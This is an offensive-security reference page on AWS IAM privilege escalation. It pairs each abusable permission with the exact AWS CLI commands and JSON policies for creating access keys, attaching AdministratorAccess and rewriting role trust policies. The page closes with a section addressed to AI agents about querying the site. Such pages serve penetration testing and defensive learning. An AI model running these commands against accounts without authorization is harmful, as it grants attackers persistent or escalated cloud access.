# Identity Access Management (IAM)

## iam:CreateAccessKey

* With access to these permissions, an attacker can create a set of IAM Access Keys, enabling them to maintain persistent access to a user.

{% code overflow="wrap" %}

```bash
aws iam create-access-key --user-name <userName>
```

{% endcode %}

***

## iam:CreatePolicyVersion and iam:SetDefaultPolicyVersion

* With access to these permissions, an attacker can create and enable a new IAM permissions policy, escalating their privileges.

{% code overflow="wrap" %}

```bash
aws iam create-policy-version --policy-arn arn:aws:iam::<accountId>:policy/<policyName> --policy-document file://<policyName>.json --set-as-default
```

{% endcode %}

```json
# example iam policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "s3:*",
            "Resource": "*"
        }
    ]
}
```

***

## iam:SetExistingDefaultPolicyVersion

* With access to this permission, an attacker can attach a different version of an IAM policy, potentially escalating privileges or gaining access to other resources.

{% code overflow="wrap" %}

```bash
# view available versions of a policy
aws iam list-policy-versions --policy-arn <policyArn>

# view the policy for a particular version
aws iam get-policy-version --policy-arn <policyArn> --version-id <versionId>

# attach a specific version of a policy
aws iam set-default-policy-version --policy-arn <policyArn> --version-id <versionId>
```

{% endcode %}

***

## iam:AttachUserPolicy

* With access to this permission, an attacker can attach a new policy to an IAM user, potentially escalating privileges or gaining access to other resources.

{% code overflow="wrap" %}

```bash
aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name <userName> 
```

{% endcode %}

***

## iam:UpdateAssumeRolePolicy

* With access to this permission, an attacker can modify an IAM Role's Trust Policy, enabling themselves or another identity (user, role, service) the ability to assume the role, potentially escalating privileges or gaining access to other resources.

{% code overflow="wrap" %}

```bash
aws iam update-assume-role-policy --role-name <roleName> --policy-document file://<trustPolicy>.json
```

{% endcode %}

```json
# example trust policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::<accountId>:user/<userName>"
            },
            "Action": "sts:AssumeRole"
        }
    ]
}
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.techwithtyler.dev/cloud-security/aws/aws-offensive-security/aws-privilege-escalation/permissions-abuse.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.